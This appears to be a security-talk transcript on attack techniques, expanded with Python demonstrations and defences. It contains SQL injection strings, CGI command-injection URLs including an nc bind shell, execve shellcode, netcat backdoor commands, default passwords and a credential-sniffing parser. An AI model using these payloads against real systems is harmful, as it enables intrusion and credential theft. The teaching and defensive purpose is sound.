festival-software-livre
Various attack techniques will be demonstrated, such as code injection, brute force, backdoors, rootkits, exploits and several other ways of gaining and keeping unauthorized access to servers; alongside them, best practices for preventing each of these attacks are discussed. (Talk given at the 3rd Festival de Software Livre in Belo Horizonte - FSLBH)
Agenda
FingerPrint
Web-Bugs
Backdoors
Brute Force
ShellCode
Exploits
Sniffers
Scanners/Fuzzers
MetaSploit
IIS SemiColon
Man-in-the-Middle
FingerPrint
Gathering information about a target host: identifying the operating system and/or the service (daemon) version from characteristics peculiar to that implementation's TCP/IP responses.
The best tool for discovering operating systems, services, devices and more: NMAP (Network Mapper)
Basic commands:
nmap host (basic port scan)
nmap -sV host (service/version detection)
nmap -P0 host (skip the ICMP echo host-discovery step; spelled -Pn in current Nmap versions)
nmap -O host (try to identify the O.S. version)
nmap -f host (fragment the probe packets, for firewall/IDS/IPS evasion)
Passive - FingerPrint
Passive fingerprinting sends no probes at all: it only looks at fields in traffic the target already emits, and the defaults differ per operating system.
• TTL - the Time To Live the operating system sets on outbound packets
• Window Size - the initial TCP window size the operating system advertises
• DF - whether the operating system sets the Don't Fragment bit
• TOS - whether the operating system sets the Type of Service field, and if so to what value
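The four fields above are enough for a first guess, and the way they combine is worth seeing in code. The following is an added example (not code from the slides or from any fingerprinting tool): the observed TTL is rounded up to the nearest initial value an OS actually uses, which also yields the hop count, and the tuple is then matched against a signature table. The table is a small constructed subset of commonly published defaults; a real tool such as p0f ships hundreds of signatures, and the sample observations are made up.

```python
"""Passive OS fingerprint from TTL, window size, DF and TOS (added example).

Not code from the original slides.  The signature table below is a small
constructed subset of commonly published defaults; p0f carries hundreds.
"""

# Initial TTL values that operating systems actually use.  An observed TTL is
# rounded up to the nearest of these; the difference is the hop count.
INITIAL_TTLS = (32, 64, 128, 255)

# (initial TTL, window size, DF bit set, TOS) -> OS guess.  Constructed subset.
SIGNATURES = {
    (64, 5840, True, 0): "Linux 2.4/2.6",
    (64, 65535, True, 0): "FreeBSD",
    (128, 65535, True, 0): "Windows XP",
    (128, 8192, True, 0): "Windows 7 / Server 2008",
    (255, 4128, False, 0): "Cisco IOS",
}

# Fallback when only the TTL family is recognised.
TTL_FAMILIES = {
    32: "Windows 9x (legacy)",
    64: "Unix-like (Linux/BSD/macOS)",
    128: "Windows",
    255: "Network device / Solaris",
}


def infer_initial_ttl(observed_ttl):
    """Return (initial_ttl, hops) for an observed TTL.

    A SYN that arrives with TTL 57 almost certainly left its sender at 64
    and crossed 7 routers; nothing starts at 57.
    """
    if not 1 <= observed_ttl <= 255:
        raise ValueError("TTL must be 1..255, got %r" % observed_ttl)
    for initial in INITIAL_TTLS:
        if observed_ttl <= initial:
            return initial, initial - observed_ttl
    raise AssertionError("unreachable")


def fingerprint(ttl, window, df, tos=0):
    """Guess the sender OS from the four passive fields on the slide."""
    initial, hops = infer_initial_ttl(ttl)
    guess = SIGNATURES.get((initial, window, bool(df), tos))
    if guess is not None:
        confidence = "high"
    else:
        # Window/DF/TOS did not match a signature: fall back to TTL family only.
        guess = TTL_FAMILIES[initial]
        confidence = "low"
    return {"os": guess, "initial_ttl": initial, "hops": hops,
            "confidence": confidence}


# Constructed observations (what a sniffer would read off captured SYNs).
OBSERVED = [
    {"src": "10.0.0.5", "ttl": 57, "window": 5840, "df": True, "tos": 0},
    {"src": "10.0.0.9", "ttl": 116, "window": 8192, "df": True, "tos": 0},
    {"src": "10.0.0.1", "ttl": 250, "window": 1024, "df": False, "tos": 0},
]

if __name__ == "__main__":
    for pkt in OBSERVED:
        r = fingerprint(pkt["ttl"], pkt["window"], pkt["df"], pkt["tos"])
        print("%-10s %-26s ttl0=%d hops=%d (%s)" % (
            pkt["src"], r["os"], r["initial_ttl"], r["hops"], r["confidence"]))
```

The hop count falls out of the TTL rounding for free, which is why passive fingerprinting also gives a rough network distance. Window size and DF are the fields most easily changed by a NAT device or a tuned kernel, so a miss on them drops the result to a TTL-family guess rather than a hard error.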
Web Vulnerability
SQL-Injection
Cross-Site Scripting (XSS)
Cross Site Request Forgery (CSRF)
CGI Command Injection
PHP-Injection
These vulnerabilities are exploited in the first instance through crafted browser requests, and can compromise the target in a matter of minutes.
Web Vulnerability
SQL-Injection
Occurs when the attacker can insert SQL fragments into a query by manipulating the application's input, so that user-supplied data is interpreted as SQL code.
SELECT fields FROM table WHERE field = '[email protected]';
Injected string: some' OR 'x'='x
Resulting query: SELECT fields FROM table WHERE field = 'some' OR 'x'='x';
Common test strings (each one must match the quoting and parenthesis context of the target query; -- and # are comment markers that cut off the rest of the statement):
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
hi" or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
');Drop table x;--
') or ('a'='a
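To see why the list above has so many variants, it helps to run a few of them against a query of the slide's shape. The following is an added example (not from the slides): a lookup built by string concatenation next to the same lookup with a bound parameter, run against an in-memory SQLite table with constructed rows. The table name, column names and rows are assumptions for the demo.

```python
"""SQL injection against the slide's query shape: string concatenation beside
a parameterized query (added example, not from the original slides).
Runs against an in-memory SQLite table with constructed rows."""
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (email, role) VALUES (?, ?)", [
        ("admin@example.com", "admin"),     # constructed rows
        ("alice@example.com", "user"),
        ("bob@example.com", "user"),
    ])
    return conn


def lookup_vulnerable(conn, email):
    """SELECT fields FROM table WHERE field = '<input>' with the input pasted in."""
    sql = "SELECT email, role FROM users WHERE email = '%s'" % email
    return conn.execute(sql).fetchall()


def lookup_safe(conn, email):
    """Same query, but the value travels as a bound parameter, never as SQL text."""
    return conn.execute(
        "SELECT email, role FROM users WHERE email = ?", (email,)).fetchall()


# Test strings from the slide.  Which ones work depends on the quoting context
# of the target query, which is why the cheat sheet lists so many variants.
PAYLOADS = [
    "some' OR 'x'='x",        # closes the quote, always-true, reopens the quote
    "admin@example.com'--",   # closes the quote and comments out the rest
    "' or 1=1--",
    "') or ('a'='a",          # meant for parenthesised queries: syntax error here
    '" or 0=0 #',             # wrong quote type and MySQL-only comment: harmless here
]


def try_payloads(conn, lookup):
    """Return {payload: row count}, or 'error' when the SQL no longer parses."""
    results = {}
    for p in PAYLOADS:
        try:
            results[p] = len(lookup(conn, p))
        except sqlite3.OperationalError:
            results[p] = "error"
    return results


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable:", try_payloads(conn, lookup_vulnerable))
    print("safe      :", try_payloads(conn, lookup_safe))
```

Against the concatenated query the always-true payloads return every row and `admin@example.com'--` returns exactly the admin row, while the parenthesised payload only produces a syntax error and the double-quoted one is compared as a plain string. With the bound parameter every payload returns zero rows and never an error, because the value is never parsed as SQL.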
Web Vulnerability
CGI Command Injection
Occurs when the attacker appends shell commands to a parameter that a vulnerable CGI script passes to the shell unfiltered. Examples (%3B is a URL-encoded ';', %24 is '$'; $IFS stands in for a space where spaces are filtered):
Nagios (statuswml.cgi, ping parameter): https://www.xxx.com/nagios/cgi-bin/statuswml.cgi?ping=173.45.235.65%3Becho+%24PATH
DD-WRT (bind shell on port 5555): http://www.xxx.com/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh
Linksys (c4_ping_ipaddr parameter of the diagnostics ping test): Wireless/setup.cgi?ping_ipaddr1=1&ping_ipaddr2=1&ping_ipaddr3=1&ping_ipaddr4=1&ping_size=60&ping_number=1&ping_interval=1000&ping_timeout=5000&start=Start+Test&todo=ping_test&this_file=Diagnostics.htm&next_file=Diagnostics.htm&c4_ping_ipaddr=1.1.1.1;/bin/ps aux&message= HTTP/1.1
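All three examples above share one bug: a "ping this host" parameter spliced into a shell command line. The following added example (not the slides' code, and not any of the affected products' code) models that CGI as a hypothetical `?ping=<host>` handler, builds the command the naive way, and then shows the two fixes a practitioner would apply: quoting when a shell is unavoidable, and validating the value as an IP literal and calling the program with an argv list so no shell is involved. The query strings are constructed in the shape of the slide's payloads.

```python
"""CGI command injection: the slide's payload shapes against a naive command
builder and a hardened one (added example, not from the slides).
The CGI is hypothetical: it takes ?ping=<host> and runs ping."""
import ipaddress
import shlex
import subprocess
from urllib.parse import parse_qs


def ping_target(query_string):
    """Decode the query string as a CGI library would (%3B -> ';', '+' -> ' ')."""
    return parse_qs(query_string, keep_blank_values=True).get("ping", [""])[0]


def vulnerable_command(query_string):
    """The bug: the decoded value is spliced into a line that a shell will parse."""
    return "ping -c 1 " + ping_target(query_string)


def quoted_command(query_string):
    """Mitigation when a shell is unavoidable: quote the value as a single word."""
    return "ping -c 1 " + shlex.quote(ping_target(query_string))


def safe_argv(query_string):
    """Fix: validate the value as an IP literal and pass an argv list, no shell."""
    target = ping_target(query_string)
    try:
        ip = ipaddress.ip_address(target)
    except ValueError:
        raise ValueError("refusing non-IP ping target %r" % target) from None
    return ["ping", "-c", "1", str(ip)]


def is_rejected(query_string):
    """True when safe_argv refuses the query string."""
    try:
        safe_argv(query_string)
    except ValueError:
        return True
    return False


def run_harmlessly(command_line):
    """Run the shell line with ping swapped for echo so the demo is offline-safe;
    anything injected after ';' still executes, which is the point."""
    demo = command_line.replace("ping -c 1", "echo would-ping", 1)
    return subprocess.run(["/bin/sh", "-c", demo], capture_output=True,
                          text=True).stdout


# Constructed query strings in the shape of the slide's examples.
NAGIOS = "ping=173.45.235.65%3Becho+%24PATH"
DDWRT = "ping=%3Bnc$IFS-l$IFS-p$IFS5555$IFS-e$IFS/bin/sh"
LEGIT = "ping=173.45.235.65"

if __name__ == "__main__":
    print(vulnerable_command(NAGIOS))
    print(run_harmlessly(vulnerable_command(NAGIOS)))   # second line is $PATH
    print(quoted_command(NAGIOS))
    print(safe_argv(LEGIT))
    for q in (NAGIOS, DDWRT):
        print("rejected:", q, is_rejected(q))
```

Note the order of the checks: the value is validated after URL decoding, because `%3B` only becomes `;` at that point, and the `$IFS` trick is caught the same way since `$` is not valid in an IP literal. Quoting alone (`shlex.quote`) stops the injection but still hands the shell a value the program will choke on; the argv form is the one to keep.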
ShellCode Introduction
A shellcode is the machine code of a small program, typically one that spawns a shell, delivered as a string and executed by an exploit. The C program below is the template; the byte string is the equivalent Linux x86 machine code with "/bin/sh" appended, using a jmp/call pair to find the string's address without knowing where the code was loaded:
#include <stdio.h>
#include <unistd.h>

int main(void)
{
    char *comando[2];
    comando[0] = "/bin/sh";
    comando[1] = NULL;
    execve(comando[0], comando, NULL);
    return 0;
}

char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x0a\x31\xc0\x88\x46\x09\x89\x46\x0e\xb0\x0b\x89"
    "\xf3\x8d\x4e\x0a\x8d\x56\x0e\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"
    "\xdc\xff\xff\xff/bin/sh";
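Before a shellcode goes into an exploit, a practitioner checks the properties that make it usable: no NUL bytes (a `strcpy`-style copy would truncate it) and a jmp/call layout that actually resolves to the string. The following added example (the bytes are the slide's; the checks are not from the slides or any tool) walks that layout: the short jmp at offset 0 must land on a call, and the call's relative target must land back on the `pop %esi` that collects the string address the call pushed.

```python
"""Structural checks on the slide's Linux x86 /bin/sh shellcode (added example;
the bytes are the slide's, the checks are not).  The jmp/call trick is what
makes it position independent: jmp forward to a call, the call pushes the
address of the string that follows it, and the pop at the jump-back target
picks that address up."""
import struct

SHELLCODE = (
    b"\xeb\x1f\x5e\x89\x76\x0a\x31\xc0\x88\x46\x09\x89\x46\x0e\xb0\x0b\x89"
    b"\xf3\x8d\x4e\x0a\x8d\x56\x0e\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"
    b"\xdc\xff\xff\xff/bin/sh"
)


def check_shellcode(code):
    """Return a report dict; raise ValueError if the jmp/call layout is broken."""
    report = {
        "length": len(code),
        # A NUL stops strcpy()-style copies, so injectable shellcode must have none.
        "null_bytes": code.count(b"\x00"),
        # int 0x80 is the Linux syscall gate; expect one for execve, one for exit.
        "syscalls": code.count(b"\xcd\x80"),
    }
    if code[0] != 0xEB:
        raise ValueError("byte 0 is not a short jmp")
    rel8 = struct.unpack("b", code[1:2])[0]
    jmp_target = 2 + rel8                       # relative to the next instruction
    if code[jmp_target] != 0xE8:
        raise ValueError("jmp does not land on a call")
    rel32 = struct.unpack("<i", code[jmp_target + 1:jmp_target + 5])[0]
    call_target = jmp_target + 5 + rel32
    if code[call_target] != 0x5E:
        raise ValueError("call does not land on pop %esi")
    report["jmp_target"] = jmp_target
    report["call_target"] = call_target
    # The return address the call pushed points at whatever follows it: the string.
    report["string"] = code[jmp_target + 5:].split(b"\x00")[0]
    return report


def c_literal(code):
    """Render bytes back as the escaped C string used on the slide."""
    return "".join("\\x%02x" % b for b in code)


if __name__ == "__main__":
    for key, value in check_shellcode(SHELLCODE).items():
        print("%-12s %r" % (key, value))
    print(c_literal(SHELLCODE[:8]) + "...")
```

Running it on the slide's bytes gives 45 bytes, zero NULs, two syscalls, a jmp to offset 33 and a call back to offset 2, with `/bin/sh` as the pushed string. The same check fails loudly on a shellcode whose relative offsets were broken by editing, which is the usual way a hand-tweaked payload stops working.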
Exploits
Kinds of exploits:
Local: usually aims to elevate the privileges of an existing user on the machine as close as possible to root (uid=0) or Administrator. Written against kernel bugs or setuid binaries.
Remote: works over a network connection and exploits the vulnerable target without any prior access to it.
Where to find them:
www.securityfocus.com
www.milw0rm.com
www.secunia.com
www.exploit-db.com
0-days: exploits for a newly found vulnerability that is not yet publicly known or patched, usually unpublished. They are bought and sold. $$$$$
Backdoors/RootKits
Backdoors are used to maintain access to the system after the initial compromise.
Netcat can serve as a minimal backdoor:
nc -vv -l -p 5555 (listen on port 5555)
nc -vv -l -p 5555 -e /bin/bash (listen and hand the incoming connection a shell: a bind shell)
nc <ip> <port> (connect to the listener from the attacker's machine)
RootKits
The main purpose of a rootkit is to hide the attacker's presence by replacing vital system binaries on the target system. Examples of what they do:
Hide files whose names match given strings
Run a command when a matching string is seen
Hide processes
Hide open ports, and others.
Default/Weak passwords
Default passwords are set by the manufacturer/developer and are never changed after installation/configuration.
They are supplied by the system vendor and meant to be changed at installation time (almost nobody does).
Ex: 3Com switch: user security, password security
FireBird: user sysdba, password masterkey
Weak: passwords that are easily guessed or follow a keyboard sequence. Ex: 123456, love, the house's phone number, a birthday, etc.
Brute Force
Consists of trying combinations of characters, numbers and symbols, wordlists and/or string generators until the password is found. Ex:
John the Ripper
Hydra
SSH brute force
Brute Force
DirBuster - a multi-threaded Java application designed to brute force directory and file names on web/application servers
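The default-password and brute-force slides above describe three attacks on the same target, a password, in increasing cost: try the vendor defaults, try a wordlist, then try every string from a generator. The following added example (not code from John the Ripper, Hydra or the slides) implements all three against a constructed salted SHA-256 hash, plus the keyspace arithmetic that says when the third one is hopeless. The salt, hashes, wordlist and the extra `admin/admin` entry are constructed; the 3Com and Firebird defaults are the slide's.

```python
"""Default-credential, dictionary and exhaustive attacks against a salted
SHA-256 (added example, not the slides' tools).  Salt, hashes and lists are
constructed for the demo."""
import hashlib
import itertools

# The two vendor defaults from the slide plus one constructed entry.
DEFAULT_CREDENTIALS = [
    ("security", "security"),   # 3Com switch
    ("sysdba", "masterkey"),    # Firebird
    ("admin", "admin"),         # constructed
]

# Constructed wordlist in the spirit of the slide's "123456, love, birthday".
WORDLIST = ["password", "love", "123456", "qwerty", "19851231", "letmein"]


def hash_password(password, salt):
    """A fast hash like SHA-256 is exactly what makes offline cracking cheap;
    a real login store should use bcrypt/scrypt/argon2 with a work factor."""
    return hashlib.sha256(salt + password.encode()).hexdigest()


def default_credential_attack(check_login):
    """Try every known vendor default; check_login(user, pw) -> bool."""
    for user, pw in DEFAULT_CREDENTIALS:
        if check_login(user, pw):
            return user, pw
    return None


def dictionary_attack(target_hash, salt, wordlist=WORDLIST):
    """Wordlist attack: hash each candidate with the stolen salt and compare."""
    for word in wordlist:
        if hash_password(word, salt) == target_hash:
            return word
    return None


def exhaustive_attack(target_hash, salt, alphabet, max_len):
    """String generator: every combination of `alphabet` up to max_len."""
    for length in range(1, max_len + 1):
        for combo in itertools.product(alphabet, repeat=length):
            candidate = "".join(combo)
            if hash_password(candidate, salt) == target_hash:
                return candidate
    return None


def keyspace(alphabet_size, max_len):
    """Number of candidates exhaustive_attack tries in the worst case."""
    return sum(alphabet_size ** n for n in range(1, max_len + 1))


SALT = b"constructed-salt"
WEAK_HASH = hash_password("123456", SALT)   # the slide's first weak example
PIN_HASH = hash_password("7301", SALT)      # 4-digit PIN, in no wordlist

if __name__ == "__main__":
    print("wordlist hit :", dictionary_attack(WEAK_HASH, SALT))
    print("wordlist miss:", dictionary_attack(PIN_HASH, SALT))
    print("digits <= 4  :", exhaustive_attack(PIN_HASH, SALT, "0123456789", 4))
    print("defaults     :", default_credential_attack(
        lambda u, p: (u, p) == ("sysdba", "masterkey")))
    print("6 digits: %d candidates, 8 alnum: %.1e" % (keyspace(10, 6), keyspace(62, 8)))
```

The wordlist finds `123456` on the third try, the PIN is only found by the exhaustive search, and `keyspace(62, 8)` shows why the same search over eight alphanumeric characters is not an offline option at this hash rate. Online attacks (Hydra against SSH) are bounded by the service instead, which is what lockouts and rate limiting are for.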
Scanners/Fuzzers
There are two types of scanners: specific ones, written for a single vulnerability class (BSQLHacker and SQLMAP for SQL injection), and generic ones, written for many kinds of vulnerabilities. Generic scanners use known service banners/strings to locate potential targets and vulnerabilities. Examples:
Saint
W3af
Nexpose Community
Sniffers
A sniffer monitors and analyzes network traffic. Some of the captured packets may contain critical information (such as logins, passwords and other sensitive data). Ex: Wireshark
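The credential harvesting the slide alludes to is mechanical once the packets are in hand. The following added example (not Wireshark's code or the slides') is a minimal Ethernet/IPv4/TCP parser that pulls HTTP Basic-auth headers and form-login fields out of cleartext requests. The frames are constructed in-process so it runs offline; on a real network they would come from a pcap file or a raw socket, and the attacker needs to be on-path (hub, mirror port, ARP spoofing) to see them at all. Addresses, ports and payloads are made up.

```python
"""What a sniffer pulls out of cleartext traffic: a minimal Ethernet/IPv4/TCP
parser that harvests HTTP Basic and form-POST credentials (added example,
not Wireshark's code).  Frames are constructed in-process so it runs offline."""
import base64
import struct
from urllib.parse import parse_qs


def build_frame(payload, src="10.0.0.5", dst="10.0.0.80", sport=40000, dport=80):
    """Constructed Ethernet II + IPv4 + TCP frame carrying `payload` (no checksums)."""
    eth = b"\x00\x11\x22\x33\x44\x55" + b"\x66\x77\x88\x99\xaa\xbb" + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s",
                     0x45, 0, 40 + len(payload), 0x1234, 0x4000, 64, 6, 0,
                     bytes(int(o) for o in src.split(".")),
                     bytes(int(o) for o in dst.split(".")))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload


def parse_frame(frame):
    """Return addresses, ports and TCP payload, or None if not IPv4/TCP."""
    if frame[12:14] != b"\x08\x00":            # EtherType must be IPv4
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4                   # header length honours IP options
    if ip[9] != 6:                             # protocol must be TCP
        return None
    tcp = ip[ihl:]
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_off = (tcp[12] >> 4) * 4              # TCP header length, options included
    return {
        "src": ".".join(str(b) for b in ip[12:16]),
        "dst": ".".join(str(b) for b in ip[16:20]),
        "sport": sport, "dport": dport,
        "payload": tcp[data_off:],
    }


def extract_credentials(payload):
    """Credentials visible in one HTTP request: Basic auth header, form fields."""
    found = []
    head, _, body = payload.partition(b"\r\n\r\n")
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"authorization: basic "):
            token = line.split(b" ", 2)[2]
            found.append(("basic", base64.b64decode(token).decode()))
    if body:
        fields = parse_qs(body.decode(errors="replace"))
        for key in ("pass", "password", "passwd", "pwd"):
            if key in fields:
                user = (fields.get("user") or fields.get("username") or ["?"])[0]
                found.append(("form", "%s:%s" % (user, fields[key][0])))
    return found


def sniff(frames):
    """Run every frame through the parser and report credentials per flow."""
    hits = []
    for frame in frames:
        pkt = parse_frame(frame)
        if pkt is None:
            continue
        for kind, cred in extract_credentials(pkt["payload"]):
            hits.append((pkt["src"], pkt["dst"], pkt["dport"], kind, cred))
    return hits


# Constructed capture: one Basic-auth GET, one form login, one harmless GET.
CAPTURE = [
    build_frame(b"GET /admin/ HTTP/1.1\r\nHost: intranet\r\nAuthorization: Basic "
                + base64.b64encode(b"sysdba:masterkey") + b"\r\n\r\n"),
    build_frame(b"POST /login HTTP/1.1\r\nHost: intranet\r\n"
                b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                b"username=alice&password=love", src="10.0.0.7"),
    build_frame(b"GET / HTTP/1.1\r\nHost: intranet\r\n\r\n"),
]

if __name__ == "__main__":
    for hit in sniff(CAPTURE):
        print("%s -> %s:%d  %s  %s" % hit)
```

Basic auth is only base64, not encryption, so the header decodes straight back to `user:password`; the form case is the same thing without even the encoding. Both disappear from the wire only when the application is behind TLS, which is the actual countermeasure to a sniffer.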
DoS
Denial of Service: attempts to prevent valid users from using a particular service, or to simply bring it down. Ex:
SYN FLOOD
UDP Packet Storm
DDoS
Smurf Attack
Hardening your server
HnTool is an open source (GPLv2) hardening tool for Unix. It scans your system for vulnerabilities and problems in configuration files, giving a quick overview of the security status of the system.
http://hntool.net